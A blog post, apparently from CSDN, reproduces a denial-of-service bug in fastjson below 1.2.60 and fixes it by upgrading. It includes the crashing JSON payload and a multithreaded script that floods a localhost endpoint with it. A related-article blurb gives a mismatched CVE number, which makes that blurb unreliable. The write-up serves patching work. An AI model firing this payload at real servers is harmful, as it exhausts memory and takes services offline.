fastjson低于1.2.60的远程拒绝服务漏洞

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量4.2k 收藏 2
点赞数 4
分类专栏: 问题解决 文章标签: fastJson 漏洞 java json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lpf463061655/article/details/100695212
版权

Fastjson 叒叕被爆出严重漏洞了

漏洞描述

首先,看一下阿里官方回应,传送门
FastJson < 1.2.60的bug描述

重现漏洞

看看Github上1.2.60版本修复漏洞后的测试用例,即可发现造成这一漏洞的死亡字符串 {“a”:"\x
下面我们在demo和真实环境中,重现“死亡字符串”的导致的bug:

1、简单Demo
    public static void main(String[] args) {
        try {
            String DEATH_STRING = "{\"a\":\"\\x";
            Object obj = JSON.parse(DEATH_STRING);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

引发的异常:大小GC+OOM异常
Demo引发的异常

2、应用中重现

我们的应用使用了SpringMvc框架,然后mvc:message-converters中MessageConverter设置为了使用FastJson 的com.alibaba.fastjson.support.spring.FastJsonHttpMessageConverter,对字符串进行JSON的序列化和反序列化,所以可以直接通过POST请求模拟出此漏洞。

  1. 使用HttpClient,开启多线程,对一个接口调用500次
    private static void testMutiThread() {
        ExecutorService threadPool = Executors.newFixedThreadPool(8);
        String url = "http://localhost:8080/pool/getBaseLogById";
        String DEATH_STRING = "{\"id\":\"10143\\x";

        for (int i = 0; i < 500; i++) {
            threadPool.submit(() -> {
                String result = HttpClientUtil.doPost(url, DEATH_STRING, HttpClientUtil.CONTENT_TYPE_JSON);
                System.out.println("响应报文为:" + result);
            });
        }
    }
  1. 使用Java VisualVM工具观察内存使用情况和GC情况
    内存飙升 3. 使用jstat命令观察GC情况
    在500次调用还未完成之前,full gc的次数就已经来到了460次左右。
    GC情况
    假如发生在线上,攻击者持续的攻击,那么内存的飙升、疯狂的Full GC、cpu的耗尽,最终会导致你的应用无法在正常提供服务。
解决漏洞

将应用中的FastJson升级到1.2.60后,“死亡字符串”由于不符合标准json格式,便会在转换中直接抛出异常。
FastJson-1.2.60中修复的具体内容:传送门

升级至1.2.60后,再继续对应用进行“使用HttpClient,开启多线程,对一个接口调用500次”,内存和GC情况如下:
其中3次Full GC和7次Young GC是在压测之前就存在的,相当于压测只产生了1次Young GC,属正常反应。
在这里插入图片描述

泡飞
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全 fastjson_【漏洞预警】Fastjson远程拒绝服务漏洞安全预警通告
weixin_30366629的博客
01-14 442
点击箭头处“蓝色字”,关注我们哦!!尊敬的客户:2019年9月5日,Fastjson项目发布更新修复了1.2.60之前版本解析到特定字符后可能触发OOM故障的问题。目前该漏洞相关利用代码已被公开,建议尽早升级到最新1.2.60版本。Fastjson是一个知名Java Json组件,可用于将Java对象转换为其JSON表示,也可用于将JSON字符串转换为等价的Java对象。奇安信安全监测与...
最新版 fastjson-1.2.69.jar
06-01
最新版 fastjson-1.2.69.jar
fastjson string转json_fastjson低于1.2.60远程拒绝服务漏洞
weixin_42121412的博客
11-28 109
漏洞描述首先,看一下阿里官方回应,传送门 重现漏洞看看Github上1.2.60版本修复漏洞后的测试用例,即可发现造成这一漏洞的死亡字符串 {"a":"x 下面我们在demo和真实环境中,重现“死亡字符串”的导致的bug:1、简单Demopublic static void main(String[] args) { try { String DEATH_S...
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
最新发布
小司机的奥拓
04-23 2280
在复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是javajavac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
fastjson-1.2.60.rar
09-17
阿里云应急响应中心监测到fastjson爆出远程拒绝服务漏洞,攻击者在请求中构造特定json字符串,可远程造成服务器内存和CPU等资源耗尽,最终拒绝服务。官方已发布公告说明,最新的1.2.60和带有sec06字符的版本不受影响
关于maven项目报错Cannot resolve com.alibaba:fastjson:1.2.70的解决方法
yanmouren110的博客
06-23 2万+
关于maven项目引入阿里巴巴fastjson报错:Cannot resolve com.alibaba:fastjson:1.2.70的解决方法 直接进入阿里的镜像仓库:https://maven.aliyun.com/mvn/search 然后搜索fastjson,找到报错的对应版本,例如我需要的是1.2.70这个版本 搜索出了以下这些, 将其下载下来后拷贝进你本地的maven仓库中的com\alibaba\fastjson目录下新建的1.2.70目录中,然后重新更新的项目依赖就行了。 ...
fastjson-1.2.74.jar和fastjson-1.2.60.jar
04-22
本篇文章将详细探讨Fastjson的两个版本——1.2.74和1.2.60,并介绍其核心功能和使用方法。 首先,我们来看一下Fastjson的基本概念。Fastjson是基于JavaJSON解析器和生成器,其设计理念是简洁、快速。它提供了流式...
fastjson-1.2.60.jar
09-10
阿里巴巴fastjson 1.2.60最新版,号称最快的json解析,2019年8月更新,修复拒绝服务安全问题。
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
Web下的拒绝服务漏洞(DoS)
yggcwhat
09-29 2434
Web下的拒绝服务漏洞(DoS)
fastjson-1.2.66.jar
10-10
fastjson 1.2.66 已发布,这又是一个维护版本,修复了一些 BUG,并且做安全加固,补充了 AutoType 黑名单。 Issues 修复某些场景下BeanToArray报错的问题 修复某些场景多版本共存导致的的兼容问题 修复JSONArray构造方法中,由null List会引发的NPE问题 修复大对象某些场景会报错的问题 #2779 修复字符串自动转换为数值时,小数点后全零报错的问题 #2838 修复某些场景下不识别Kotlin泛型的问题 修复开始SupportNonPublicField特性后JSONField配置name不支持private字段的问题 #28
框架/组件漏洞系列2:fastjson漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-04 1万+
一、Fastjson 概况 1、fastjson简介 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。 优点: FastJson数度快,无论序列化和反序列化,都是当之无愧的fast 功能强大(支持普通JDK类包括任意Java Bean Class、Collection、Map、Date或enum) 零依赖(没有依赖其它任何类库) 2、漏洞.
FastJson1.2.68分析
LTianHang的博客
06-06 587
FastJson1.2.68漏洞分析
Cannot resolve symbol ‘alibaba‘.fastjson.JSON
weixin_44638539的博客
10-18 5148
JSON的parseArray方法将字符串转换成对象 时,springboot项目导包出错 出现 这时候在pom文件加上坐标 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.4</version> </dependency> 就可以导包成功了: ...
解决FastJson com.alibaba.fastjson.JSONObject cannot be cast to的问题
热门推荐
刘剑峰的博客
06-22 28万+
FastJson的pom依赖:<dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.33</version> </dependency>听闻FastJson使用特别的算法,速度非常快,甚至快过Google的protobuf,所以选择使用FastJso
安卓拒绝服务漏洞分析及漏洞检测
weixin_34216196的博客
09-18 198
  “超级拒绝服务漏洞”是一个安卓通用型拒绝服务漏洞,恶意***者可能利用此漏洞让手机中的任意应用崩溃无法正常工作,几乎影响目前市面上所有的安卓APP应用。  漏洞分析:  0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。  针对序列化对象而出现的拒绝服务主要是由于应用...
OPENSSL拒绝服务漏洞【CVE-2022-0778】
Armandhe的博客
03-18 2237
OPENSSL拒绝服务漏洞【CVE-2022-0778】
CVE-2020-13935:Apache Tomcat拒绝服务漏洞复现
weixin_38896449的博客
12-02 7326
CVE-2020-13935-Apache Tomcat拒绝服务漏洞1.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 CVE-2020-13935,WebSocket拒绝服务漏洞漏洞等级为重要。 Apache Tomcat WebSocket帧中的有效负载长度未正确验证,无效的有效载荷长度可能会触发无限循环,多有效负载长度无效的请求可能会导致拒绝服务。 2.影响版本 Apache Tomcat 10.0.0-M1-10.0.0-M6 Apache Tomcat 9.0.0.M1-9.0.36
fastjson< 1.2.69远程代码执行漏洞cve编号
01-04
fastjson< 1.2.69远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是由于fastjson在处理反序列化时存在漏洞,攻击者可以通过构造恶意的JSON数据来触发fastjson的反序列化过程,最终实现执行恶意代码的目的。由于fastjson是非常常见的JSON解析库,因此该漏洞可能影响许多使用fastjson的应用程序。 为了防范这一漏洞,建议及时更新fastjson至最新版本,并且在使用fastjson解析JSON数据时,对输入的数据进行严格的验证和过滤,避免恶意JSON数据的注入。此外,也应加强系统安全意识教育,及时关注官方的安全公告,并且注意其他安全防护措施,以保护系统免受漏洞的攻击。 总之,CVE-2021-21351是一个比较严重的远程代码执行漏洞,对系统的安全性造成了潜在威胁。我们应该保持警惕,及时采取相应的安全防护措施,以确保系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值